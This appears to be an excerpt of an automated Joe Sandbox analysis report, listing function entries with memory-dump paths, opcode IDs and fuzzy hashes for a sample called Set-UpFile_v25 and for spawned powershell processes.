                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2002f25d54dc64b5be8fc0fabfc0b6cc1cff300f7fa11f028fb868e6e050b805
                                                                                                                                                                • Instruction ID: 137026e5644d9cdd87c58a18fcecb70f281e339a6b335318634c116df847da7e
                                                                                                                                                                • Opcode Fuzzy Hash: 2002f25d54dc64b5be8fc0fabfc0b6cc1cff300f7fa11f028fb868e6e050b805
                                                                                                                                                                • Instruction Fuzzy Hash: F311CC75A142009FD7208B5C8844BBBF3A6E7C6330F28873DF495571D5DB3498418B99
                                                                                                                                                                Function 029969E8 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 235aade8cfda86804b9262fadacc57fa8766ff46ec5d742e3dee61bd750f1b6c
                                                                                                                                                                • Instruction ID: b2a82e6634760f7d03cbdb98f1dda37d41bbdf1d2958dcfeca3437ddef475cea
                                                                                                                                                                • Opcode Fuzzy Hash: 235aade8cfda86804b9262fadacc57fa8766ff46ec5d742e3dee61bd750f1b6c
                                                                                                                                                                • Instruction Fuzzy Hash: 8201A2346161028FCF18DF2C9891936B3ADFB47325F28E53CD49193150F330D8919A19
                                                                                                                                                                Function 029AB28E Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 02857f7856dacbf7de50f48d66221ea3b217e52ba00610d7a1f2b2f17cd52e88
                                                                                                                                                                • Instruction ID: 05a656ffc0f156eaef921da0ef1e23e396848d02d7a4b5f7d206687cf7bd4428
                                                                                                                                                                • Opcode Fuzzy Hash: 02857f7856dacbf7de50f48d66221ea3b217e52ba00610d7a1f2b2f17cd52e88
                                                                                                                                                                • Instruction Fuzzy Hash: C401A2604083818BC7168F2580B022AFBE0EFB7349F08989AE8D29B212E335D455CB66
                                                                                                                                                                Function 0298CE9F Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 5c8c3cdfaae57673cfd8b30e47bbdc9f81b332e5934e5216a320c01eb433e3d2
                                                                                                                                                                • Instruction ID: 45e2e1a555213a41d75628eea3e98b44e4e85989f9146f86a9a62e6845d3636f
                                                                                                                                                                • Opcode Fuzzy Hash: 5c8c3cdfaae57673cfd8b30e47bbdc9f81b332e5934e5216a320c01eb433e3d2
                                                                                                                                                                • Instruction Fuzzy Hash: 5511C673A129419BF3094E19C824356EB63AFD2215F1DC25DC0680BB8DCF79541A8B80
                                                                                                                                                                Function 029AA1F9 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 867716a56c5ddbd2339e452c325c2570f5d209fc07af71fc2af4bf56226273a1
                                                                                                                                                                • Instruction ID: f59990414db31056b552e66ff902e397134b832176f7783babf335819e1f1d6e
                                                                                                                                                                • Opcode Fuzzy Hash: 867716a56c5ddbd2339e452c325c2570f5d209fc07af71fc2af4bf56226273a1
                                                                                                                                                                • Instruction Fuzzy Hash: 56F0BB75A013009FDA149F14DCA153E73B6FB92315F64692CE492531A4D331DC54CB89
                                                                                                                                                                Function 029C0F02 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: b8d75ba11848f37334e33f3ee6bc273d17a2ef0306c9cae138f3f2ff2027f673
                                                                                                                                                                • Instruction ID: ccf46f73d0e14bc9064cba944d05586f1fb7a735a57d80dbc482e197f2dbfb0a
                                                                                                                                                                • Opcode Fuzzy Hash: b8d75ba11848f37334e33f3ee6bc273d17a2ef0306c9cae138f3f2ff2027f673
                                                                                                                                                                • Instruction Fuzzy Hash: D7F0A476504308EBD1204B459C81D37B76EEB8EB2CF24033DF958531A1E322EE51CBA6
                                                                                                                                                                Function 029968A7 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 997393ea9fb04f19f6f221c67a65246d984ddd09cc78f2bf2a448fd4914494e4
                                                                                                                                                                • Instruction ID: 6ee3217d2436d5e968464ba8d00cac91c49ab468ca0f510504bec31d76565df9
                                                                                                                                                                • Opcode Fuzzy Hash: 997393ea9fb04f19f6f221c67a65246d984ddd09cc78f2bf2a448fd4914494e4
                                                                                                                                                                • Instruction Fuzzy Hash: 4D01F474A05211CFD718CF0CD89153AB3AAEBA6314F540A3CF28123261E334AC16CB96
                                                                                                                                                                Function 0299CB12 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 6b60d92f034b1d3e42354d3c585600494f47b129c7cfa50f561b72fa9a9e639e
                                                                                                                                                                • Instruction ID: e6bd2095fef3a5b2cda7854111c6619c4543ed34b4ac111c22dab607d2d7838e
                                                                                                                                                                • Opcode Fuzzy Hash: 6b60d92f034b1d3e42354d3c585600494f47b129c7cfa50f561b72fa9a9e639e
                                                                                                                                                                • Instruction Fuzzy Hash: B6F0C2705096918FEB268F3D989023AFBE2BF5B210F1891ADC1D29B297C635E442CB15
                                                                                                                                                                Function 0298CE43 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 72609d23d3f0ca88a1a6546ce7761e9877870bf706f1c736c72ef269828dc019
                                                                                                                                                                • Instruction ID: 4ed62b722324772d1cd3d1c111aeb2aa50ff8d6bfeb5cfd7b2353fcc1df05613
                                                                                                                                                                • Opcode Fuzzy Hash: 72609d23d3f0ca88a1a6546ce7761e9877870bf706f1c736c72ef269828dc019
                                                                                                                                                                • Instruction Fuzzy Hash: C5F090729065428BE3094E25C824325FB63AFD2214F5DC25AC0641BB89CBB9541A8B84
                                                                                                                                                                Function 02980CE5 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                • Instruction ID: 0163c8cd7962fe3bdcb9eeb379d0cf8d158993bdd92e8a56ad82b732ef202752
                                                                                                                                                                • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                • Instruction Fuzzy Hash: DF01B634A01208EFCB15EF98C194AACF7B6FF48314F648599D8159B385E731BE46DB50
                                                                                                                                                                Function 029AA282 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 765806fde20d8dcc7fcfe6c8729d71e89f661a911a86bf786ca863ebb5393a0e
                                                                                                                                                                • Instruction ID: b5e30ed1dd1bd535dbe819dc3d90314d132179eb0108d758df8c6a23f75f008d
                                                                                                                                                                • Opcode Fuzzy Hash: 765806fde20d8dcc7fcfe6c8729d71e89f661a911a86bf786ca863ebb5393a0e
                                                                                                                                                                • Instruction Fuzzy Hash: 09F05875A09301DFCB14CF28D8A052EB3F5FF96306F58A828E48693128D330E844CB4A
                                                                                                                                                                Function 0299038C Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0456bf1ec266ed6600d3704076b4c01ba8b36363b32de00f05b1f8b2243114ca
                                                                                                                                                                • Instruction ID: 8bb6a226bd8e72e6db49d1bf2439088f4b93ea9b8e809485632a8d5fdce1314b
                                                                                                                                                                • Opcode Fuzzy Hash: 0456bf1ec266ed6600d3704076b4c01ba8b36363b32de00f05b1f8b2243114ca
                                                                                                                                                                • Instruction Fuzzy Hash: 53F0DA3999928086C368FB14D8709E9B372AFE5319F9A682D808A13150DF307A4BDE95
                                                                                                                                                                Function 029AB041 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 57d4475b23516832be138171ae162e5f203d8e09132b8bb9a7d75c8523c0a536
                                                                                                                                                                • Instruction ID: 1a9eb7405c8cbef94589eba3ef3fbc4761dea260f4efd0b0bce4cbf883b93e27
                                                                                                                                                                • Opcode Fuzzy Hash: 57d4475b23516832be138171ae162e5f203d8e09132b8bb9a7d75c8523c0a536
                                                                                                                                                                • Instruction Fuzzy Hash: 26D02B0184C7728E421C0E0440B13B0D5267FA3248B18C39084F927A1DC6428C478AD4
                                                                                                                                                                Function 029C3672 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 6aa58c32fd690b776d74c4e1317dc42f764286d9f7f2d00c556c5013b3098f9a
                                                                                                                                                                • Instruction ID: 3a43958e8847f5015855b174c05cbbbd0b69a8c932eda76d430439d300f6dc39
                                                                                                                                                                • Opcode Fuzzy Hash: 6aa58c32fd690b776d74c4e1317dc42f764286d9f7f2d00c556c5013b3098f9a
                                                                                                                                                                • Instruction Fuzzy Hash: BDE01A7090C3408BE712AF2CD16536BFBE4AB87310F909D5CD4D48B292D3BE94698B47
                                                                                                                                                                Function 029A11F2 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                • Instruction ID: 85e8c743f2d431835b909fdf04402ee1994981aa3ae252a51ea612406ba04c3b
                                                                                                                                                                • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                • Instruction Fuzzy Hash: EDD0A7719487A50E5B68CD3404B0477FBECE947622F18159EE8D5E3119D320D8014A9C
                                                                                                                                                                Function 0298C5A2 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: d087fa91208b593d2c70268908f23f03f2b4ec53e294519b1fbd61e6f77adf78
                                                                                                                                                                • Instruction ID: 7313cf0884d1d276f0e3abe2ac3a455dfc8328a1998be270ec1e925e58a2c175
                                                                                                                                                                • Opcode Fuzzy Hash: d087fa91208b593d2c70268908f23f03f2b4ec53e294519b1fbd61e6f77adf78
                                                                                                                                                                • Instruction Fuzzy Hash: 02C01279A084028FC600DF28C890CA5BBB6A38B200B06A468C848D3264D734E9028A08
                                                                                                                                                                Function 029ACE22 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0284827c023eb69505ee92246e1337a2e8b44741b25114c43f03babfb873e9a0
                                                                                                                                                                • Instruction ID: ffb79f2734df539b3f4905129d35f90c14d05c8d403a6557f8227ca74cb6777b
                                                                                                                                                                • Opcode Fuzzy Hash: 0284827c023eb69505ee92246e1337a2e8b44741b25114c43f03babfb873e9a0
                                                                                                                                                                • Instruction Fuzzy Hash: 1EC08C31806A00D6C7209F0080412B3F378B783334F26E72988B4771C0A770F8098BE9
                                                                                                                                                                Function 02999DE8 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e12dc24b8c468de5dd0fc2b79d50133aadbf51828ef8d51ed1458c28cec9c938
                                                                                                                                                                • Instruction ID: be1d001aac084a8cf0b4b3d7e5dc32493ceff045fd9db250b316d8bf338a28f3
                                                                                                                                                                • Opcode Fuzzy Hash: e12dc24b8c468de5dd0fc2b79d50133aadbf51828ef8d51ed1458c28cec9c938
                                                                                                                                                                • Instruction Fuzzy Hash: ABA0017480A51CCE82041F209408078F67AAA0B292F4430A49009A7025CAB180459A0C

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00B52F78 Relevance: .5, Instructions: 473COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1970691715.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_b50000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 09c3cfbb33b4717926892e9a8f119b369b111ae4626cec583d8bbe7fc334ecc1
                                                                                                                                                                • Instruction ID: df7e4febcfc9f04f7ec5ef770061f24e36abf75ef40a170cceb2b2ed107cc84a
                                                                                                                                                                • Opcode Fuzzy Hash: 09c3cfbb33b4717926892e9a8f119b369b111ae4626cec583d8bbe7fc334ecc1
                                                                                                                                                                • Instruction Fuzzy Hash: BD124C74A002499FCB05CF98D494AAEFBF2FF48350F258599E805AB365C735EE85CB90
                                                                                                                                                                Function 00B54900 Relevance: .3, Instructions: 339COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1970691715.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_b50000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: cdaa17bbd30656771a27857a3d7ed7decbb5815f1913b51efe48cb3de96141cd
                                                                                                                                                                • Instruction ID: d0073da8277935ae648706549cf9c921b88238ff7dbb9aed038387d9b6d939f9
                                                                                                                                                                • Opcode Fuzzy Hash: cdaa17bbd30656771a27857a3d7ed7decbb5815f1913b51efe48cb3de96141cd
                                                                                                                                                                • Instruction Fuzzy Hash: 57D16034A052489FCB05CFA8D580A9EFBF1EF49314F2581D5E844AB366C735ED89CB90
                                                                                                                                                                Function 06F81B1D Relevance: .1, Instructions: 132COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1982163381.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: fb5374a0f8ffc67814e097266c3ed7562c74903696e0c5ef31642331609d96a7
                                                                                                                                                                • Instruction ID: f689c7008ea276feeaad8e884efd6217f6a0cd20f3738bb16f7fbff5d27531c0
                                                                                                                                                                • Opcode Fuzzy Hash: fb5374a0f8ffc67814e097266c3ed7562c74903696e0c5ef31642331609d96a7
                                                                                                                                                                • Instruction Fuzzy Hash: 8E413E72F402158FC765F6B89851A9ABBA29FD2314B1045FAD5019F352EE21C847C7E1
                                                                                                                                                                Function 00B533F0 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1970691715.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_b50000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 3931c62a5e3f7769b57b37a26d13e8060ea66f99e001d9fc73896f3f4cedf73c
                                                                                                                                                                • Instruction ID: 28252059507e68cf25341a04997cc06bd1523f2e7363f89923edd1c4833a5d12
                                                                                                                                                                • Opcode Fuzzy Hash: 3931c62a5e3f7769b57b37a26d13e8060ea66f99e001d9fc73896f3f4cedf73c
                                                                                                                                                                • Instruction Fuzzy Hash: E24138B4A005058FCB0ACF58C194AAAFBF1FF48750B158199D845AB364C736FE55CFA0
                                                                                                                                                                Function 00B52A61 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1970691715.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_b50000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 9b812749c5ca4916d2ecbc1e2b58953e17dc0164aa59ada6f60f86c19365ac66
                                                                                                                                                                • Instruction ID: f07ec1d132a3edbeee225fe46328d7efc62751318fc692f93bd4369dd47729d1
                                                                                                                                                                • Opcode Fuzzy Hash: 9b812749c5ca4916d2ecbc1e2b58953e17dc0164aa59ada6f60f86c19365ac66
                                                                                                                                                                • Instruction Fuzzy Hash: 10315074A096858FCB02CF58C890AEAFFB0FF4A310B1581D7D444EB662C335AD45CBA1
                                                                                                                                                                Function 00B53400 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1970691715.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_b50000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: cf765f724520ba07dca25a59af5ebd504036b7e1f1d1247b565242b85f1acfe6
                                                                                                                                                                • Instruction ID: 20e9b7b1cc76adcc1a15b00448731d821294f4b2e89eeb7dac0bde28c97c2f26
                                                                                                                                                                • Opcode Fuzzy Hash: cf765f724520ba07dca25a59af5ebd504036b7e1f1d1247b565242b85f1acfe6
                                                                                                                                                                • Instruction Fuzzy Hash: 5E4126B4A005099FCB09CF48C194AAAFBF1FF48750B1181A9D905AB364C736FE50CFA0
                                                                                                                                                                Function 00B52AB0 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1970691715.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_b50000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: c1a7287e3563e0b8510ce09716b6da64d753f67e2a6b27ba526ff1e5d3ec6113
                                                                                                                                                                • Instruction ID: 970d5c5372a73716f16c6b5959f2955986ef8499b968be5bb6e105246aeeb490
                                                                                                                                                                • Opcode Fuzzy Hash: c1a7287e3563e0b8510ce09716b6da64d753f67e2a6b27ba526ff1e5d3ec6113
                                                                                                                                                                • Instruction Fuzzy Hash: 1B211974A016099FCB01CF59C980AAEFBF1FF49310B248596E919EB361C735EC41CBA0
                                                                                                                                                                Function 00B548F1 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1970691715.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_b50000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 78a067a503f4c804ec8e482f914b647884231a757034bed7d33a5fb25b6df716
                                                                                                                                                                • Instruction ID: ffc905ddda10a5580f80b038d8f88c27c99f584c4d4bb98b000bca038d74df7a
                                                                                                                                                                • Opcode Fuzzy Hash: 78a067a503f4c804ec8e482f914b647884231a757034bed7d33a5fb25b6df716
                                                                                                                                                                • Instruction Fuzzy Hash: 63214D74A002198FCB00DF9DD480AAEFBF5FF89314B1485A5E919AB352C731ED45CBA0
                                                                                                                                                                Function 0074D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1970403084.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_74d000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 8ad3b3898efba0afa8f96fdadf384720cab6a4792946a4f558ac6e0af3661978
                                                                                                                                                                • Instruction ID: b73f52e19b38f94fc6c6565b0234dc49e85339dd29228299daea6994e5f4a47d
